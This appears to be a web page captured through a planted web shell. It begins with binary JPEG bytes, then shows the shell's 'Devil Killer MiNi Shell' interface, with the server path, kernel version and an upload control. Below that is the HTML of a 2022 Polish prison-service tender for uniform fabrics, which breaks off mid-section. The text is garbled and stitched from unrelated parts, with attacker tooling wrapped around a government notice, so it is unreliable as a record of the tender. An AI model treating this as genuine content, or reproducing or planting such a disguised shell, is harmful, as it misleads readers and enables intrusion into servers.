JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220829/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220829/0032365701-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa tkanin mundurowych( gabardyna, gabardyna letnia, tropik ) do Centralnej Składnicy Magazynowej (Działu Magazynów)<br/>przy Areszcie Śledczym w Łodzi, ul. Smutna 21, 91-729 Łódź. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzi podmiot, któremu powierzono przeprowadzenie postępowania</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Areszt Śledczy w Łodzi</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000590409</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Smutna 21</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Łódź</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">91-729</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">łódzkie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL711 - Miasto Łódź</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">42675-00-00</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">as_lodz@sw.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.sw.gov.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Porządek i bezpieczeństwo publiczne</span> </h3> <h3 class="mb-0">1.11.) Dane podmiotu, któremu zamawiający powierzył przeprowadzenie postępowania.</h3> <h3 class="p-2 mt-4 bg-light">Podmiot <span class="normal">1</span></h3> <h3 class="mb-0">1.11.1.) Nazwa podmiotu prowadzącego postępowanie: <span class="normal">Areszt Śledczy w Łodzi</span></h3> <h3 class="mb-0">1.11.2.) Krajowy Numer Identyfikacyjny: <span class="normal">726-15-57-739</span></h3> <h3 class="mb-0">Adres podmiotu prowadzącego postępowanie: </h3> <h3 class="mb-0">1.11.3.) Ulica: <span class="normal">Smutna</span></h3> <h3 class="mb-0">1.11.4.) Miejscowość: <span class="normal">Łódź</span></h3> <h3 class="mb-0">1.11.5.) Kod pocztowy: <span class="normal">91-729</span></h3> <h3 class="mb-0">1.11.6.) Województwo: <span class="normal">łódzkie</span></h3> <h3 class="mb-0">1.11.7.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.11.8.) Lokalizacja NUTS 3: <span class="normal">PL711 - Miasto Łódź</span></h3> <h3 class="mb-0">1.11.9.) Numer telefonu: <span class="normal">+ 48 42675-00-00</span></h3> <h3 class="mb-0">1.11.11.) Adres poczty elektronicznej: <span class="normal">as_lodz@sw.gov.pl</span></h3> <h3 class="mb-0">1.11.12.) Adres strony internetowej: <span class="normal">www.sw.gov.pl</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa tkanin mundurowych( gabardyna, gabardyna letnia, tropik ) do Centralnej Składnicy Magazynowej (Działu Magazynów)<br/>przy Areszcie Śledczym w Łodzi, ul. Smutna 21, 91-729 Łódź. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-694e2acf-2784-11ed-b8b2-9a321cc30829</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00323657</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-08-29</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00056529/05/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.2 Dostawa tkanin( gabardyna mundurowa, gabardyna letnia, tropik mundurowy) do Centralnej Składnicy Magazynowej ( Działu Magazynów) przy Areszcie Ś ledczym w Łodzi</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://miniportal.uzp.gov.pl/ ; www.zp.sw.gov.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://miniportal.uzp.gov.pl<br/>https://epuap.gov.pl/wps/portal<br/>as_lodz@sw.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1) W postępowaniu o udzielenie<br/>zamówienia komunikacja między zamawiającym a wykonawcami odbywa się przy użyciu miniPortalu, który dostępny jest pod<br/>adresem: https://miniportal.uzp.gov.pl/, ePUAPu, dostępnego pod adresem: https://epuap.gov.pl/wps/portal oraz poczty<br/>elektronicznej: as_lodz@sw.gov.pl<br/>2) Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto na ePUAP.<br/>Wykonawca posiadający konto na ePUAP ma dostęp do następujących formularzy: „Formularz do złożenia, zmiany, wycofania<br/>oferty lub wniosku” oraz do „Formularza do komunikacji”.;<br/>3) Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i<br/>oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały w Regulaminie korzystania z systemu miniPortal oraz<br/>Warunkach korzystania z elektronicznej platformy usług administracji publicznej (ePUAP);<br/>4) Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy: „Formularz złożenia, zmiany, wycofania<br/>oferty lub wniosku” i „Formularza do komunikacji” wynosi 150 MB;<br/>5) Za datę przekazania oferty, wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń lub elektronicznych kopii<br/>dokumentów lub oświadczeń oraz innych informacji przyjmuje się datę ich przekazania na ePUAP/adres skrzynki elektronicznej;<br/>6) Zamawiający przekazuje na stronie prowadzonego postępowania ID postępowania. Dane postępowanie można wyszukać<br/>również na liście wszystkich postępowań w miniPortalu klikając wcześniej opcję „Dla Wykonawców” lub ze strony głównej z zakładki<br/>Postępowania.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.10.) Przyczyny odstąpienia od komunikacji elektronicznej: </h3> <p class="mb-0">zamawiający wymaga przedstawienia modelu fizycznego, modelu w skali lub próbki, których nie można przekazać przy użyciu środków komunikacji elektronicznej (art. 65 ust. 1 pkt 4 ustawy)</p> <h3 class="mb-0">3.11.) Sposób nieelektronicznego składania ofert, wniosków, oświadczeń oraz innych dokumentów: <span class="normal">Zamawiający w<br/>odniesieniu do przedmiotowych środków dowodowych- próbek tkanin (wskazanych w rozdziale II podrozdział 5 SWZ) odstępuje od wymogu użycia środków komunikacji elektronicznej na podstawie art. 65 ust. 1 pkt. 4) ustawy Pzp. Zgodnie zatem z art. 65 ust. 2 –<br/>w/w przedmiotowe środki dowodowe należy dostarczyć do siedziby zamawiającego, przed upływem terminu składania ofert za<br/>pośrednictwem operatora pocztowego w rozumieniu ustawy<br/>z dnia 23 listopada2012r. – Prawo pocztowe (Dz. U. z 2020 r. poz. 1041), osobiście lub za pośrednictwem posłańca.<br/>Próbki tkanin należy dostarczyć do siedziby zamawiającego (Areszt Śledczy w Łodzi, ul. Smutna 21,<br/>91 – 729 Łódź, sekretariat jednostki) w nieprzejrzystym opakowaniu / zamkniętej kopercie, podając:<br/>a) nazwę i adres zamawiającego<br/>b) nazwę i adres firmy wykonawcy<br/>i oznaczyć :<br/>„Przedmiotowe środki dowodowe – dotyczy postępowania o udzielenie zamówienia w trybie podstawowym bez negocjacji,<br/>nr DKW.2232.21.2022.KB na dostawę tkanin mundurowych: gabardyna w ilości – 774 mb. ( część I ),<br/>gabardyna letnia w ilości – 2364 mb. ( część II ), tropik w ilości 747 mb. ( część III ) do Centralnej Składnicy Magazynowej (Działu<br/>Magazynów) przy Areszcie Śledczym w Łodzi, ul. Smutna 21, 91-729 Łódź.<br/>Nie otwierać przed: 06.09.2022, godz. 11.30 ”.</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">RODO (obowiązek informacyjny): Odbiorcami przekazanych przez wykonawcę danych osobowych będą osoby lub<br/>podmioty, którym zostanie udostępniona dokumentacja postępowania zgodnie z art. 8 oraz art. 96 ust. 3 ustawy Pzp, a także art. 6<br/>ustawy z 6 września 2001 r. o dostępie do informacji publicznej. Dane osobowe wykonawcy zawarte w protokole postępowania będą<br/>przechowywane przez okres 4 lat, od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy<br/>przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy. Klauzule informacyjne, o których mowa w art. 13 i art.<br/>14 RODO, znajdują się w załączniku nr 12, 13 do SWZ. Zamawiający nie planuje przetwarzania danych osobowych wykonawcy w<br/>celu innym niż cel określony w lit. b powyżej. Jeżeli administrator będzie planował przetwarzać dane osobowe w celu innym niż cel, w<br/>którym dane osobowe zostały zebrane (tj. cel określony w lit. b powyżej), przed takim dalszym przetwarzaniem poinformuje on<br/>osobę, której dane dotyczą, o tym innym celu oraz udzieli jej wszelkich innych stosownych informacji, o których mowa w art. 13 ust. 2<br/>RODO.Wykonawca jest zobowiązany, w związku z udziałem w przedmiotowym postępowaniu, do wypełnienia wszystkich<br/>obowiązków formalnoprawnych wymaganych przez RODO i związanych z udziałem w przedmiotowym postępowaniu o udzielenie<br/>zamówienia. Należą do nich obowiązki informacyjne z:<br/>- art. 13 RODO względem osób fizycznych, których dane osobowe dotyczą i od których dane te wykonawca bezpośrednio pozyskał i<br/>przekazał zamawiającemu w treści oferty lub dokumentów składanych na żądanie zamawiającego,<br/>- art. 14 RODO względem osób fizycznych, których dane wykonawca pozyskał w sposób pośredni, a które to dane wykonawca<br/>przekazuje zamawiającemu w treści oferty lub dokumentów składanych na żądanie zamawiającego.W celu zapewnienia, że<br/>wykonawca wypełnił ww. obowiązki informacyjne oraz ochrony prawnie uzasadnionych interesów osoby trzeciej, której dane zostały<br/>przekazane w związku z udziałem w postępowaniu, wykonawca składa oświadczenie o wypełnieniu przez niego obowiązków<br/>informacyjnych przewidzianych w art. 13 lub art. 14 RODO – treść oświadczenia została zawarta w załączniku nr 10 do SWZ.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">DKw.2232.21.2022.KB</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 266095,75 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Opis Przedmiotu Zamówienia część I – Gabardyna mundurowa – 774 mb.<br/>1. Charakterystyka wyrobu.<br/>1.1. Skład surowcowy tkaniny.<br/>• Wełna – 45%, Poliester – 55%.<br/>1.2. Splot.<br/>• Rządkowy reformowany.<br/>1.3. Masa tkaniny.<br/>• Liniowa – 480 g/m ± 10 g/m;<br/>• Powierzchniowa – 333 g/m2 ± 10 g/m2.<br/>1.4. Szerokość tkaniny.<br/>• 144 cm ± 2 cm.<br/>1.5. Liczba nitek w tkaninie na 1 dm.<br/>• Osnowa – 556 ± 20;<br/>• Wątek – 256 ± 15.<br/>1.6. Kolor.<br/>• Ciemno – szary (stalowy).<br/>• Współrzędne barwy: L = 24,90; a = 0,15; b = - 6,86; Δ E ≤ 1,5.<br/>1.7. Parametry przędzy (masa liniowa [tex] i skręt).<br/>• Osnowa – 19 Z 630 x 2 S 640;<br/>• Wątek – 19 Z 630 x 2 S 640.<br/>2. Znakowanie.<br/>Oznakowanie w formie etykiety umieszczonej przy rolce powinno zawierać przynajmniej :<br/>• Dane producenta;<br/>• Skład surowcowy tkaniny;<br/>• Szerokość tkaniny;<br/>• Długość nawiniętej tkaniny;<br/>• Masę nawiniętej tkaniny;<br/>• Oznaczenie jakości tkaniny.<br/>3. Pakowanie, przechowywanie, transport.<br/>3.1. Pakowanie.<br/>1<br/>DKw.2232.21.2022.KB Załącznik nr 6<br/>Tkanina powinna być nawinięta na tekturową tuleję, długość nawiniętego materiału nie powinna<br/>przekraczać 60 mb. Każda rolka zapakowana w folię.<br/>3.2. Przechowywanie.<br/>Tkaninę należy przechowywać w pomieszczeniach przewiewnych, suchych, pozbawionych obcych<br/>zapachów. Wyrób powinien być zabezpieczony przed zniszczeniem przez pleśń, bakterie i inne<br/>czynniki zewnętrzne, zawilgoceniem, poplamieniem, zabrudzeniem, a także przed bezpośrednim<br/>działaniem promieni słonecznych.<br/>3.3. Transport.<br/>Załadowanie, przewóz (w zamkniętych środkach transportu) i wyładowanie powinny odbywać się<br/>w warunkach zabezpieczającymi tkaninę przed zabrudzeniem, zamoczeniem, uszkodzeniami<br/>mechanicznymi i chemicznymi zgodnie z obowiązującymi przepisami transportowymi. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">19200000-8 - Tkaniny włókiennicze i podobne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">3 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty dla I, II i III części zamówienia, zamawiający będzie kierował się następującymi<br/>kryteriami i odpowiadającymi im znaczeniami oraz w następujący sposób będzie oceniał spełnienie kryteriów:<br/>Lp. Kryterium Ranga [%]<br/>1 Cena (C) 60<br/>2 Termin realizacji zamówienia (Tr) 40<br/>Oferty będą oceniane przez komisję przetargową metodą punktową w skali 100-punktowej.<br/>Nazwa kryterium - „Cena” (C)<br/>Waga kryterium – 60 %<br/>Wzór : (cena brutto najtańszej oferty/cena brutto ocenianej oferty) x 60<br/>Sposób punktowania – przyjmuje się, że 1% = 1 pkt . W kryterium „Cena” można uzyskać maksymalnie 60,00 pkt. Oferta<br/>wypełniająca w najwyższym stopniu wymagania otrzyma maksymalną liczbę punktów. Pozostałym ofertom, wypełniającym<br/>wymagania kryterialne przypisana zostanie odpowiednio mniejsza (proporcjonalnie mniejsza) liczba punktów. Wynik będzie<br/>traktowany jako wartość punktowa oferty.<br/>Nazwa kryterium - „Termin realizacji zamówienia” (Tr)<br/>Waga kryterium – 40 %<br/>Sposób punktowania - przyjmuje się, że 1% = 1 pkt . W kryterium „ Termin realizacji zamówienia ” można uzyskać<br/>maksymalnie 40,00 pkt. Zamawiający przyzna wykonawcy 20 pkt. za każde skrócenie terminu realizacji zamówienia<br/>o 1 miesiąc w stosunku do wymaganego terminu realizacji zamówienia określonego przez zamawiającego w SWZ,<br/>czyli 3 miesięcy od dnia podpisania umowy.<br/>Zgodnie z powyższym oferta z terminem realizacji zamówienia :<br/>– 3 miesiące od dnia podpisania umowy otrzyma 0 pkt.<br/>– 2 miesiące od dnia podpisania umowy otrzyma 20 pkt.<br/>– 1 miesiąc od dnia podpisania umowy 40 pkt.<br/>W przypadku gdy wykonawca zaoferuje inny termin realizacji zamówienia niż jeden z terminów wskazanych powyżej,<br/>oferta wykonawcy podlegać będzie odrzuceniu na podstawie art. 226 ust.1 pkt 5 Pzp.<br/>Oferta, która przedstawia najkorzystniejszy bilans (maksymalna liczba przyznanych punktów w oparciu o ustalone kryteria)<br/>zostanie uznana za najkorzystniejszą, pozostałe oferty zostaną sklasyfikowane zgodnie z ilością uzyskanych punktów.<br/>Zamówienie zostanie udzielone wykonawcy, który uzyska najwyższą ilość punktów. Jeżeli nie będzie można dokonać<br/>wyboru oferty najkorzystniejszej ze względu na to, że dwie lub więcej ofert otrzyma taką samą punktację, zamawiający<br/>spośród tych ofert wybierze ofertę z najniższą ceną, a jeżeli zostały złożone oferty o takiej samej cenie, zamawiający wezwie<br/>wykonawców, którzy złożyli te oferty, do złożenia w terminie przez siebie określonym ofert dodatkowych. O wyborze<br/>wykonawcy, zamawiający niezwłocznie zawiadomi uczestników postępowania, którzy ubiegali się o udzielenie zamówienia.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Opis Przedmiotu Zamówienia część II – Gabardyna letnia – 2364 mb.<br/>1. Charakterystyka wyrobu.<br/>1.1. Skład surowcowy tkaniny.<br/>• Wełna – 45%, Poliester – 55%.<br/>1.2. Splot.<br/>• Rządkowy 2/1 Z.<br/>1.3. Masa tkaniny.<br/>• Liniowa – 360 g/m ± 10 g/m;<br/>• Powierzchniowa – 234 g/m2 ± 10 g/m2.<br/>1.4. Szerokość tkaniny.<br/>• 154 cm ± 2 cm.<br/>1.5. Liczba nitek w tkaninie na 1 dm.<br/>• Osnowa – 330 ± 10;<br/>• Wątek – 240 ± 10.<br/>1.6. Kolor.<br/>• Ciemno – szary (stalowy).<br/>• Współrzędne barwy: L = 24,90; a = 0,15; b = - 6,86; Δ E ≤ 1,5.<br/>1.7. Parametry przędzy (masa liniowa [tex] i skręt).<br/>• Osnowa – 19 Z 630 x 2 S 640;<br/>• Wątek – 19 Z 630 x 2 S 640.<br/>2<br/>DKw.2232.21.2022.KB Załącznik nr 6<br/>2. Znakowanie.<br/>Oznakowanie w formie etykiety umieszczonej przy rolce powinno zawierać przynajmniej :<br/>• Dane producenta;<br/>• Skład surowcowy tkaniny;<br/>• Szerokość tkaniny;<br/>• Długość nawiniętej tkaniny;<br/>• Masę nawiniętej tkaniny;<br/>• Oznaczenie jakości tkaniny.<br/>3. Pakowanie, przechowywanie, transport.<br/>3.1. Pakowanie.<br/>Tkanina powinna być nawinięta na tekturową tuleję, długość nawiniętego materiału nie powinna<br/>przekraczać 70 mb. Każda rolka zapakowana w folię.<br/>3.2. Przechowywanie.<br/>Tkaninę należy przechowywać w pomieszczeniach przewiewnych, suchych, pozbawionych obcych<br/>zapachów. Wyrób powinien być zabezpieczony przed zniszczeniem przez pleśń, bakterie i inne<br/>czynniki zewnętrzne, zawilgoceniem, poplamieniem, zabrudzeniem, a także przed bezpośrednim<br/>działaniem promieni słonecznych.<br/>3.3. Transport.<br/>Załadowanie, przewóz (w zamkniętych środkach transportu) i wyładowanie powinny odbywać się<br/>w warunkach zabezpieczającymi tkaninę przed zabrudzeniem, zamoczeniem, uszkodzeniami<br/>mechanicznymi i chemicznymi zgodnie z obowiązującymi przepisami transportowymi. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">19200000-8 - Tkaniny włókiennicze i podobne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">3 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) 